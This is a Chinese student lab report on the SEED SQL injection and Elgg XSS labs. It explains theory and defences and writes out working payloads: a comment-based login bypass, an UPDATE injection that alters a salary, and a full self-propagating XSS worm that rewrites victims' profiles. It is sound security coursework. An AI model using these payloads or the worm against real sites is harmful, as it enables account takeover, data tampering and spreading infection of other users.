20222813 2022-2023-2 《网络攻防实践》实践十报告

1.实践内容

1.1 sql注入攻击：

• 原理：web应用程序对用户输入数据的合法性没有判断，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息

• 总体思路：发现SQL注入位置，判断后台数据库类型，确定XP_CMDSHELL可执行情况，发现WEB虚拟目录，上传ASP木马，得到管理员权限

• 防范措施：普通用户与系统管理员用户的权限要有严格的区分；在构造动态SQL语句时使用类安全的参数加码机制；加强对用户输入的验证

1.2 xss注入攻击：

• 原理：攻击者往Web页面里插入恶意html标签或者javascript代码，当用户浏览该页或者进行某些操作时，攻击者利用用户对原网站的信任，诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息

• 类型：

  • 持久型跨站：此类XSS不需要用户单独点击特定URL就能执行跨站脚本，攻击者事先将恶意的JavaScript代码上传或者存储到漏洞服务器上，只要受害者浏览包含此恶意代码的页面，就会执行恶意代码

  • 非持久型跨站：攻击者通过特定手法（比如是电子邮件），诱使用户去访问一个包含恶意代码的URL，当受害者单击这些专门设计的链接的时候，恶意javascript代码会直接在受害者主机上的浏览器上执行

  • DOM跨站:DOM，即文档对象模型（Document Object Model ），客户端的脚本程序可以通过DOM动态检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行；如果DOM中的数据没有经过严格确认，就会被注入攻击

• 防范措施：在表单提交或者url参数传递前，对需要的参数进行过滤；检查用户输入的内容中是否有非法内容，如尖括号、引号等，严格控制输出

2.实践过程

2.1 SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序，并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：

2.1.1 熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

本次实验使用的虚拟机Ubuntu，打开终端输入指令：sudo su提升至root（密码是:dees），然后输入指令：service apache2 status，查看apache服务是否处于活跃状态，如图可知开启了apache服务

输入指令：mysql -u root -p，登录mysql数据库（密码是：seedubuntu）

查看mysql数据库中所有的库

进入这个名为Users的数据库。再输入指令：show tables;

 

 查询Users数据库中名为creditential的表中存储的内容

想要指定获取员工的某项信息的话.输入指令：select Name from creditential;查看此表中存储的员工姓名

2.1.2 对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

登陆www.SEEDLabSQLInjection.com，用户名测试输入：admin，密码测试输入：1234567890。

 在登录界面键入F12，然后点击Login，即可捕获刚才登录操作的数据。
这时登录界面提示输入的账户不存在，且通过捕获的数据发现该Web应用程序将输入的用户名和密码发送至unsafe_home.php校验

通过捕获的数据发现该Web应用程序将输入的用户名和密码发送至unsafe_home.php校验

 输入：/var/www/SQLInjection/unsafe_home.php，在Text Editor中打开www.SEEDLabSQLInjection.com存储动态信息文件var中的unsafe_home.php，即可查询到源代码

可以得到：SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= ’Admin'#’ and Password=’$hashed_pwd’

 该Web应用通过用户名Admin区分管理员和员工。管理员（用户名Admin）可select所有员工的个人信

 

 登陆时键入用户名Admin'#，口令空着.#后的代码就成了注释语句，不参与程序运行，并且用户名还是Admin，这样做的结果是在不输入口令的情况下便能以管理员角色登陆系统。成功以管理员角色登入系统，完成对SELECT语句的SQL注入攻击：

 

 

2.1.3 对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

用户名输入Boby'#，口令空，以员工Boby的角色登录系统。

将Boby的昵称取为Bob,由捕获数据可知unsafe_edit_backend.php是用于保存编辑的

 在Text Editor中打开www.SEEDLabSQLInjection.com存储动态信息文件var中的/var/www/SQLInjection/unsafe_edit_backend.php，即可查询到源代码

 在NickName空白处键入', salary='20222823';#

 成功将Boby的薪水改为20222823，对UPDATE语句的SQL注入攻击

 2.1.4SQL对抗：修复上述SQL注入攻击漏洞。

修复上述SQL注入攻击漏洞就是要使这个Web应用程序能区分输入字符和可执行代码，以免混用

现在注入攻击失败

 

 

2.2 SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。

2.2.1发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。

打开Firefox输入网址www.xsslabelgg.com,并登录alice的账号

 点击alice edit profile，在Brief description中输入XSS攻击代码<script> alert('20222823');</script>

点击save保存后，该Web应用程序立即显示警报窗口 

2.2.2弹窗显示cookie信息：将cookie信息显示。

在Alice主页中点击Edit profile，在Brief description中输入

 点击save保存后，Web应用程序立即弹窗显示cookie信息

2.2.3窃取受害者的cookies：将cookie发送给攻击者。

在Alice主页中点击Edit profile，在Brief description中输入。其中192.168.19.159为Ubuntu的IP地址，2813为任一可用端口

2.2.4成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。

使用js程序加受害者为朋友,登录Alice账户后，访问http://www.xsslabelgg.com/profile/boby进入Boby的主页。按键ctrl+shift+E进入开发者模式，点击Network，准备捕获添加好友操作的数据，点击Add friend，添加Boby为好友

 

 编写出如下脚本以自动成为受害者boby的朋友，将其键入Alice主页的About me中（Edit HTML）

 登录Boby的账号，访问Alice的主页

 再查看Latest activity，发现Alice成为受害者boby的朋友了

 

2.2.5修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。

登录Alice账户后，将Alice的About me修改为202823。
键入ctrl+shift+E进入开发者模式，点击Network，准备捕获添加修改操作的数据，点击save保存修改。

 Web应用程序发送的请求为

 

 

 

 编写出如下脚本以修改受害者boby的信息，将其键入Alice主页的About me中（Edit HTML）

 登录boby账户后，点击Alice的个人简介会弹窗

 看boby的个人简介，发现boby的个人简介信息被修改了

 

2.2.6编写XSS蠕虫。

在Alice页面edit profile->file About me中输入下列js脚本代码

<script id="worm" type="text/javascript">
window.onload = function(){
    var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
    var jsCode = document.getElementById("worm").innerHTML;
    var tailTag = "</" + "script>"; 
    var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

    var userName=elgg.session.user.name;
    var guid="&guid="+elgg.session.user.guid;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;

    //Construct the content of your url.
    var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by 20211911's xss attack  "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
    alert(content)

    var samyGuid=44;

    if(elgg.session.user.guid!=samyGuid){
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST",sendurl,true);
        Ajax.setRequestHeader("Host","www.xsslabelgg.com");
        Ajax.setRequestHeader("Content-Type",
        "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>

点击save保存后，发现boby已被感染

 

2.2.7对抗XSS攻击。

 可以使用elgg的安全插件HTMLawed禁止部分代码块的执行让蠕虫攻击失效

3.学习中遇到的问题及解决

• 问题1：在页面中找不到Edit Profile
• 问题1解决方案：按住ctrl+鼠标滑轮缩小页面比例

4.实践总结

对sql注入和xss攻击有了新的认识和了解，以及通过Web信息，构造SEED XSS跨站脚本来进行攻击，了解了其基本原理。